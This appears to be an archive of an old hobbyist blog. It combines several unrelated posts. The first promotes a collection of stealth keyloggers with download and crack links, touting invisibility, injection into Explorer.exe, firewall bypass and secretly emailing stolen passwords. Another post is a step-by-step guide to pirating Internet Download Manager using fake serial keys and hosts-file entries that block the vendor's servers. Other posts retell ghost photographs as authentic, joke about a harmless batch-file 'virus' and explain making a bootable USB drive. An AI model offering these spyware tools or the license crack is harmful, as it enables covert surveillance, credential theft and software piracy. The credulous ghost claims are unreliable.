Sunday, 27 October 2013

Keylogger - collection

Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as atrojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

lets see some of the key logger's

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.[Download ][Crack ]

XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP} [Download ][Crack ]

Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager![Download ][Crack ]

SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[Download ]

Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7 [Download ][Crack ]

Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.[Download ]


KLG:Download 

Type: Keylogger
A Plus: Download 
Type: Keylogger
Curiosity: Download 
Type: Keylogger
This keylogger will store all keystrokes in

C:\windows\KeyLogs.txt
Elitek3yl0gg3r10: Download 
Type: Keylogger
1)No Process Visible in any Task manager,Process explorer(2k,xp,9x)
2)Injects into Explorer.exe on startup and exiting the parent.
3)Firewall bypassing by injecting code into IE and sending mail
4)Invisible Startup, will not show in msconfig,autorun.exe (sysinternals)
5)Automatic Uninstall
6)Protucted Storage ,Cashed Passwords sender
7)No need ur own SMTP server(sending directly) to MX.
8)Remote Installer,Uninstaller
9)Built in Binder makes the keylogger same as the binded EXE(Icon,Version)
0)HTML formatted logs
11)Detect ICQ/MSN/AOL/Yahoo Chats.
12)Logging Window names,All keys typed in that window.
13)EXE Size is 12.7 KB
FKS: Download 
Type: Keylogger
Fearless Keyspy v2.0 has a very small (2.5 KB) assembly server,
with a low memory usage.
New features include a "webget" feature, a better GUI and lots of
deeper server and editor improvements
FKWP20: Download 
Type: Keylogger
1)logging all keystrokes
2) Download 2 urls cab files and extracting and executing the inside exes (Firewall bypass)
3) Protected storage (Outlook, IE stored passes),Cashed Dialup passes Sender
4) keystrokes ,passes will mail to the email id,daily or the log size is over
5) firewall bypassing by injecting code into IE and sending mail
6) No Process visible ,injects into Explorer.exe on startup and exiting
7) Active Setup Startup
8) EXE size is 11.9 KB
9) encrypted log file
10) File manager for controlling remote system
K3Yl0G3R: Download 
Type: Keylogger
For more hacking tools , warez , full appz , ip scanners and tons
of direct illegal downloads at http://www.openpc.co.nr
Key Copy: Download 
Type: Keylogger
You use KEYCOPY to keep a record of any keyboard activity on your computer.
This includes usage in Wordperfect 5.0,Multimate,Norton Editor. Keycopy copy's
each keystroke to a buffer within the KEYCOPY program area. When the keycopy
buffer has 200 keystrokes in memory, keycopy will copy the buffer to a file
with a date and time stamp. The file default is c:\keycopy. You can specify
drive,subdirectory and file name by having the parameter file called KC.PRM
in the subdirectory where KEYCOPY is executed from. If you change the KC.PRM
file and want the change to take effect with keycopy. The computer will have
to be rebooted, and Keycopy executed again. Keycopy has been tested and used
with DOS 3.3 and 4.0 and uses less than 3k of memory.
skl01: Download 
Type: Keylogger
1)Targetted keylogging(logs only the keys from the specifyed windows)
2)keystrokes will mail to the email id,daily or the log size is over
3)firewall bypassing by injecting code into IE and sending mail
4) Deleting all Cookies at installation.
5) EXE size is 8.5kb
6) we can create  our own keylogger using the editor,we can specify the window titiles (the keys need to log),our email id,smtp server,log size)

SHAIK BILAL AHMED CISCO IT ESSENTIAL (1-6) LESSONS RESULT By CISCO NETWORK ACADAMY


Thursday, 1 August 2013

Hack or crack IDM manually

IDM TIPS & TRICKS


 










Step 1: Download the Latest IDM from Here or If you already have IDM installed Update it by going to Help---}} then to check for Updates.If you don't wanna update your version, Just click on Registration.



Step2: When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.




Step3: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:



RLDGN-OV9WU-5W589-6VZH1

HUDWE-UO689-6D27B-YM28M

UK3DV-E0MNW-MLQYX-GENA1

398ND-QNAGY-CMMZU-ZPI39

GZLJY-X50S3-0S20D-NFRF9

W3J5U-8U66N-D0B9M-54SLM

EC0Q6-QN7UH-5S3JB-YZMEK

UVQW0-X54FE-QW35Q-SNZF5

FJJTJ-J0FLF-QCVBK-A287M



And click on ok to register.



Step4: After you click ok, it will show an error message that you have registered IDM using fake serial key and IDM will exit. Now here the hack starts.


Step5: Now Go to START => Then go to RUN and type the following text and click enter:




notepad %windir%\system32\drivers\etc\hosts



Note : For Windows 7 users, due to security reasons you will not be able to save hosts file.

so follow this steps :

First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.





Step6 (windows 7 or vista): Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.




Step7 (windows 7 or vista): For more Details Go To: ( How to edit Windows 7 or Vista Hosts File)


Open with Notepad




Now copy the below lines of code and add to hosts file as shown above image box :



127.0.0.1 tonec.com

127.0.0.1 www.tonec.com

127.0.0.1 registeridm.com

127.0.0.1 www.registeridm.com

127.0.0.1 secure.registeridm.com

127.0.0.1 internetdownloadmanager.com

127.0.0.1 www.internetdownloadmanager.com

127.0.0.1 secure.internetdownloadmanager.com

127.0.0.1 mirror.internetdownloadmanager.com

127.0.0.1 mirror2.internetdownloadmanager.com



After adding these piece of code, save the notepad file. And exit from there.



Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.




That means it will remain full version for life time and you can update it without any problem in future.



 proof of Successfully Hacking IDM:





I hope you are now able to convert your Trial version of IDM into Full Version. If you have any problem in this tutorial on

How To Hack and Crack IDM,

please mention it in comments.Enjoy .........

Friday, 31 August 2012

Top 15 Most Famous Ghost Pictures Ever Taken


"The Brown Lady" of Raynham Hall
 
This photo was taken in 1936 at Raynham Hall in Norfolk, England. This portraint of "The Brown Lady" is arguably the most famous and well-regarded ghost photograph ever taken. The ghost is thought to be that of Lady Dorothy Townshend, wife of Charles Townshend, 2nd Viscount of Raynham, residents of Raynham Hall in Norfolk, England in the early 1700s. It was rumored that Dorothy, before her marriage to Charles, had been the mistress of Lord Wharton. Charles suspected Dorothy of infidelity. Although according to legal records she was buried in 1726, it was suspected that the funeral was a sham and that Charles had locked his wife away in a remote corner of the house until her death many years later.
 
 
Stair Case Ghost of National Museum, Greenwich, England
 
 
 
Rev. Ralph Hardy, a retired clergyman from White Rock, British Columbia, took this now famous photograph in 1966. He intended merely to photograph the beautiful staircase in the Queen's House section of the National Museum in Greenwich, England. Upon development, however the photo revealed a shrouded figure climbing the stairs, seeming to hold the railing with both hands. Experts, including some from Kodak, who examined the original negative concluded that it had not been tampered with. Its been said that unexplained figures have been seen on occasion in the vicinity of the staircase, and unexplained footsteps have also been heard.
 
 
Darn Backseat Drivers!
 
 
In 1959 Mable Chinnery went to the cemetery to visit the grave of her mother, as any devoted daughter is apt to do. She took some photos of the gravesite and then turned and took this picture of her husband sitting alone in the car's passenger seat. The film was developed and this came out: somebody sitting in the backseat wearing glasses, clear as day. Mrs. Chinnery swore that the "backseat driver" was none other than her own mother... whose gravesite she was standing next to when she took the picture! Hmmmm... a live husband and a deceased mother-in-law looking over his shoulder: there's a joke here, I just know it.

 
What Do You Want On Your Tombstone?
 
 
Back in 1996 Ike Clanton took this photo of a friend wearing western duds, in the middle of Tombstone's Boothill Graveyard. They swear that nobody else was in sight when they made this picture. Furthermore, some time later they tried to restage this picture with someone standing at the spot where the "mystery man" appears in the background. Ike Clanton says that it was impossible to take such a picture and not show the rear person's legs. Clanton said he wasn't so sure about Tombstone being haunted, but this photo made a believer out of him. There's so much ghostly activity going on in the famous town that Clanton's set up a special section of his website dedicated to Tombstone's population of yesteryear. Well worth checking out, if nothing else than for the sense of history that this excellent website conveys.
 
 
Come On Baby, Light My Fire
 

 
 
Of all the ghost photos I've seen (well, except for that one that I can't show at the present time), this one is hands-down the most eerie. Probably the most disturbing too. I didn't know about this one until a few months ago. Almost ten years ago, on November 19th, 1995, Wem Town Hall in Shropshire, England was engulfed in flames and burned to the ground. As firefighters tried to stave off the inferno a town resident, Tony O'Rahilly, took pictures from across the street using a telephoto lens on his camera. There, rather clearly in one of the photos, is what looks very much to be a small girl standing in a doorway, with the brightness of the flames behind her. No one ever remembered there being a small girl present on scene, much less in that close a proximity to the fire. The photo and the original negative were turned over to a photo expert who decided that the picture was 100% authentic: "The negative is a straightforward piece of black-and-white work and shows no sign of having been tampered with." Okay, so what's a girl ghost doing in such a big fire? Well in 1677 a fire destroyed many of Wem's wooden houses. The fire was said to have been caused by a 14-year old girl named Jane Churm, who had been careless with a candle. Churm died in the fire along with several others, and her ghost is said to still haunt the area. Whether there's such a thing as ghosts or not, it must be said: if this is just a trick, an illusion of smoke and fire that happened to be captured on film, it's a zillion-to-one coincidence that it just so happened to appear in the form of a girl who also died in a terrible fire at the same location. But hey, stranger things than that have happened in this world, right?
 
 
Ghost of Bachelor's Grove Cemetery, Chicago
 
This photo was taken during an investigation of Bachelor's Grove Cemetery near Chicago by the Ghost Research Society(GRS). On August 10, 1991 several memeber of the GRS were at the cemetery, a small abandoned garveyard on the edge of the Rubio Woods Forest Preserve, near the suburb of Midlothian, Illinois. Reputed to be one of the most haunted cemeteries in the U.S., Bachelor's Grove has been the site of well over 100 different reports of strange phenomena, including apparitions, unexplained sights and sounds, and even glowing balls of light. When developed, this image emerged: what looks like a lonely looking young woman dressed in white sitting on a tombstone. Parts of her body her partially tranparent and the style of the dress seems to be out of date.
 
"And the sea gave up the dead which were in it..."
 
 
I first saw this photo over twenty years ago. It was the first "ghost photo" I ever came across and it still wigs me out to look at it. In 1924 James Courtney and Michael Meehan, two crewmen of the tanker S.S. Watertown, were accidentally killed by gas fumes while cleaning a cargo tank. The crew of the Watertown - on its way to the Panama Canal from New York City ' buried the two sailors at sea off the Mexican coast. That was on December 4th. On December 5th the first mate reported that the faces of Courtney and Meehan were appearing in the water off the port side of the ship. Over the next several days every member of the crew witnessed the faces appear and disappear, including the ship's captain. When he reported this to his supervisors after docking in New Orleans it was suggested that he try to photograph the faces. Captain Keith Tracy bought a camera and the ship was soon underway again. Sure enough, the faces appeared, and Tracy took six pictures, then secured the camera in the ship's vault. The camera was not removed until it was taken to a commercial developer after docking in New York City. Five of the photos showed nothing unusual, but the sixth clearly showed what was said to be the faces of the two dead crewmen. No evidence of forgery or tampering of the film was ever discovered. The faces stopped appearing after a new crew was brought aboard the Watertown.

 
The Newby Church Monk
 
 
Reverend K.F. Lord took a picture of the altar at his church in North Yorkshire, England (why are the GOOD ghosts always found in England?) and this is what came out. The picture and the negative are said to have been thoroughly examined by photographic experts and they can't find any evidence that this was either a double exposure, or artificially altered. The "thing" is calculated to be standing nine feet tall, and no one's found any record of a monk that humongous ever being at Newby Church. Who is it? What is it? Trick of light or something else? Either way it's way too creepy to not mention on this list.
 
 
Ghost Child at Cemetery
 
 
A woman named Mrs. Andrews was visiting the grave of her daughter Joyce, who died at 17. Andrews saw nothing unusual when she took this photo of Joyce's gravemarker. When the film was developed, Mrs. Andrews was astonished to see the image of a small child sitting happily at her daughter's grave. The ghost child seem to be aware of Mrs. Andrews since he or she is looking directly into the camera. Is it possible a double exposure? Mrs. Andrews said there were no such children nearby when she took the photograh and moreover did not recognize the child at all. It was no one she would have taken photograh of. She remarked that she did not believe it was the ghost of her daughter as a child.

 
London's St. Botolph's Chruch Ghost
 
In 1982, photographer Chris Brackley took a photograph of the interior of London's St. Botolph's Chruch, but never expected what would appear on the film. High in the Church's loft, seen in the upper right hand corner of his photogarph, is a transparent form of what looks like a woman. According to Brackley, to his knowledge there were only three people in the church when this photograh was taken, and none of them were in that loft.

 
Church Minister Ghost
 
According to Brad Steiger's Real Ghosts, restless spirits and haunted places, where this photo was found, there was only one other photographer in the church beside the person who took this picture. Neither of them recalled seeing ghost or any flesh-and-blood person standing there who could account for this image. Because the figure is all in black, it has been theorized that the apparition could be that of the churuch minister.
 
 
Grandfather Ghost Standing Behind Grandmother
 
 
 
"The lady in the color photo is my granny," she says. "She lived on her own until age 94, when her mind started to weaken and had to be moved to an assisted living home for her own safety. At the end of the first week, there was a picnic for the residents and their families. My mother and sister attended. My sister took two pictures that day, and this is one of them. It was taken on Sunday, 8/17/97, and we think the man behind her is my grandpa who passed away on Sunday, 8/14/84. We did not notice the man in the picture until Christmas Day, 2000 (granny had since passed away), while browsing through some loose family photos at my parents' house. My sister thought it was such a nice picture of granny that she even made a copy for mom, but still, nobody noticed the man behind her for over three years! When I arrived at my parents' house that Christmas day, my sister handed me the picture and said, "Who do you think this man behind granny looks like?" It took a few seconds for it to sink in. I was absolutely speechless. The black and white photos show that it really looks like him."
I don't need what might be a ghost's photograph to attest to this truth: when you're in love with that one special someone, nothing will stop you from being with that person. But it's still pretty nice to get a tangible confirmation of that every once in awhile..
 
 
Railroad Crossing Ghost in San Antonio, Texas
 
 
 
A Strange legend surrounds a railroad crossing of San Antonio, Texas. The intersection of the roadway and railraod track, so the story goes, was the site of a tragic accidents in which several school-aged children were killed - but their ghosts linger at the spot and will push idled cars across the tracks, even though the path is uphill. Andy and Debi Chesney's daughter and some of her friends had recently been to the crossing to test the legend, and she took some photographs. Inexplicably, a strange, transparent figure turned up in one of the photos.
 
 
Freddy Jackson's Comeback
 
 
Freddy Jackson was a mechanic in the Royal Air Force in World War I. Freddy Jackson's squadron served onboard the H.M.S. Daedalus. Freddy Jackson was killed in 1919 when an airplane propeller hit him. Two days later when the squadron assembled for a group photo, Freddy Jackson faithfully showed up, grinning behind the ear of a fellow comrade. Guess nobody bothered to tell Freddy Jackson that he was dead. His face was widely recognized in this photo by members of the squadron.
 
 
His Favorite Chair
 
 
Remember how Archie Bunker liked his recliner so much that he never let anyone else sit in it? Well, ol' Archie doesn't have anything on Lord Combermere. After being ran over by a horse-drawn carriage he died in 1891. A photographer set up a camera with its shutter open for one hour in the manor's library while the entire staff was off at Lord Combermere's funeral, some four miles away. When the plate was developed, the startling image of what looks to be a man's head and arm sitting in the chair was immediately noticed. Many of the staff said that the image looked very much like the late lord, and it happened to be sitting in Combermere's favorite chair in the library.

Monday, 16 July 2012

Creat virus in ur fnds PC .



Now i will show how to create fake virus in your computer, this is a
good computer & notepad tricksto play with your friends
S, this is the initial step to become a hacker…
1–> open "notepad"
Type the commands given in given below :-
@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as "MyTricksTime.bat" extension
for example if your file name is "virus" save it as "virus.bat"
Hurray !!! i had created a virus !!

Create bootable window 7 , vista, xp USB Flash/ Pen Drive


Create bootable window 7 , vista, xp USB Flash/ Pen DriveLets begin the guide without wasting time. Just make sure that you
have a pen drive with 4GB + capacity if you are making a bootable USB
flash drive.
Requirements to create bootable Windows USB:
# Windows 7 or Vista ISO
# Pen drive with 4GB+ (2 GB is sufficient for XP)
# 15 Minutes of free time
Procedure:
1. Insert your USB flash/pen drive to your system and backup all the
data from the USB as your USB drive will be formatted during the
process.
2. Now download software WinToFlash tool (free).(FROM google)
3. Run the tool, and browse to your Windows 7, Vista, or XP DVD files
(make sure that your USB drive letter is correct).
4. Click Create button to begin the bootable USB process. Wait for few
minutes to see the bootable USB.
5. Thats all!